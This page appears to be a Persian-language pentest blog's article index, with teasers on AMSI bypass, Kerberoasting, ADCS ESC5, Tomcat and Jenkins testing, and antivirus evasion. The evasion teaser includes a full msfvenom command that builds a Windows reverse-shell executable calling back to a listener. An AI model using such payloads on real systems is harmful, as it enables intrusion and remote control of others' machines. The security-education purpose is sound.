مقالات تست نفوذ
-
Burp Suite برای تست نفوذ: افزونه Autorize
بهمنظور حفاظت از داراییهای آنلاین، تست امنیتی وباپلیکیشن یکی از عناصر حیاتی در راستای ایمنسازی آنها محسوب میشود. Burp Suite طی سالهای متمادی در این حوزه پیشرو بوده و همچنان توسط متخصصان امنیت و هکرهای اخلاقی مورد استفاده قرار میگیرد. یکی از افزونههایی که در جامعه تست امنیت وب برجسته است، Autorize نام دارد که مجموعهای گسترده از قابلیتهای اضافی…
بیشتر بخوانید » -
راهنمای جامع در مورد Bypass کردن AMSI
مایکروسافت استاندارد Antimalware Scan Interface (AMSI) را توسعه داد که به توسعهدهندگان امکان میدهد مکانیزمهای دفاع در برابر بدافزار را در نرمافزار خود ادغام کنند. AMSI این قابلیت را فراهم میکند که یک برنامه با هر آنتیویروس نصبشده روی سیستم تعامل داشته باشد و از اجرای بدافزارهای پویا و مبتنی بر اسکریپت جلوگیری کند. در این مقاله، به بررسی دقیقتر…
بیشتر بخوانید » -
بررسی حمله Kerberoasting در Active Directory
در این مقاله به بررسی حمله Kerberoasting میپردازیم؛ حملهای مخفیانه در Active Directory که با سوءاستفاده از Service Principal Names (SPNs)، هشهای بلیت TGS را استخراج و کرک کرده و منجر به افشای گذرواژههای حسابهای سرویس میشود. برخلاف AS-REP Roasting، این روش از درخواستهای مشروع Kerberos بهرهبرداری میکند. در این مطلب، پیکربندی آزمایشگاهی، اجرای حمله با استفاده از ابزارهای Impacket،…
بیشتر بخوانید » -
راهاندازی آزمایشگاه Web Application Pentest با استفاده از Docker
در حوزه امنیت سایبری، Penetration Testing و Vulnerability Assessment از گامهای کلیدی برای شناسایی و کاهش تهدیدات امنیتی بالقوه محسوب میشوند. با توجه به افزایش چشمگیر تعداد برنامههای تحت وب، نیاز به محیطهای آزمایشی امن و پایدار بیش از هر زمان دیگری اهمیت پیدا کرده است. در این مقاله، به بررسی مفهوم Vulnerable Web Applications، اهمیت آنها در فرآیند Penetration…
بیشتر بخوانید » -
بررسی حمله Kerberos Username Bruteforce در Active Directory
در این مقاله، تکنیک بهرهبرداری (Exploitation) موسوم به Kerberos Username Bruteforce یا حمله brute-force پیشاحراز هویت Kerberos مورد بررسی قرار میگیرد. این حمله با سوءاستفاده از پاسخهای پروتکل Kerberos، امکان شناسایی نامهای کاربری معتبر و انجام brute-force برای رمزهای عبور را فراهم میکند. مقاله حاضر روشهای بهرهبرداری و تکنیکهای مقابله را تشریح میکند و آنها را برای شفافیت بیشتر به…
بیشتر بخوانید » -
ADCS ESC5 : آسیبپذیری در کنترل دسترسی به اشیاء زیرساخت کلید عمومی
حمله ESC5 یکی از حملات با ریسک بالا علیه زیرساخت سرویسهای گواهینامهی Active Directory Certificate Services (ADCS) محسوب میشود. این نوع حمله با سوءاستفاده از دسترسی ناایمن به کلید خصوصی مرجع صدور گواهینامه (Certificate Authority – CA) انجام میگیرد. در شرایطی که مهاجم بتواند به سطح دسترسی مدیر محلی (Local Administrator) در سرور CA دست یابد، قادر خواهد بود کلید…
بیشتر بخوانید » -
بررسی ماژول Autorize در نرم افزار Burp Suite
برای محافظت از داراییهای آنلاین، تست امنیتی برنامههای تحت وب یکی از ارکان اساسی در فرآیند ایمنسازی آنها محسوب میشود. ابزار Burp Suite سالهاست که بهعنوان یکی از پیشروترین پلتفرمها در این حوزه شناخته میشود و همچنان توسط کارشناسان امنیت سایبری و هکرهای کلاهسفید (Ethical Hackers) بهطور گسترده مورد استفاده قرار میگیرد. در میان افزونههای مختلفی که در جامعهی تست…
بیشتر بخوانید » -
تست نفوذ Tomcat
Tomcat Penetration Testing نقش حیاتی در شناسایی آسیبپذیریهای موجود در Apache Tomcat ایفا میکند؛ سرویسی که بهطور گسترده بهعنوان یک web server و servlet container در توسعهی برنامههای تحت وب مورد استفاده قرار میگیرد. در ابتدا، Apache Software Foundation این پروژه را با هدف ارائهی یک پلتفرم نمایشی برای فناوریهای Java Servlet و JavaServer Pages (JSP) راهاندازی کرد؛ فناوریهایی که…
بیشتر بخوانید » -
تست نفوذ Jenkins
تست نفوذ Jenkins برای شناسایی آسیبپذیریهای امنیتی در Jenkins ضروری است. Jenkins یک سرور اتوماسیون متنباز است که برای پیادهسازی پیوسته (Continuous Integration – CI) و تحویل پیوسته (Continuous Delivery – CD) استفاده میشود. این ابزار که بر پایه زبان برنامهنویسی جاوا ساخته شده است، از یک پلتفرم اسکریپتنویسی بهره میبرد تا وظایفی مانند ساخت، تست و استقرار در چرخه…
بیشتر بخوانید » -
روشهای عبور از آنتیویروس با بهرهگیری از قالبهای آماده Metasploit و ساخت فایلهای اجرایی سفارشی
در اینجا نگاهی سریع داریم به چند روش ساده برای عبور از شناسایی آنتیویروسها هنگام استفاده از شلکدها. ۴۸ مورد شناسایی از بین ۶۸ آنتیویروس برای تست اولیه، یک پیلود Reverse Shell استاندارد با استفاده از Metasploit برای سیستمهای ۳۲ بیتی ویندوز تولید میکنیم. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f exe > /root/tools/av.exe با بررسی این فایل در سرویس VirusTotal،…
بیشتر بخوانید »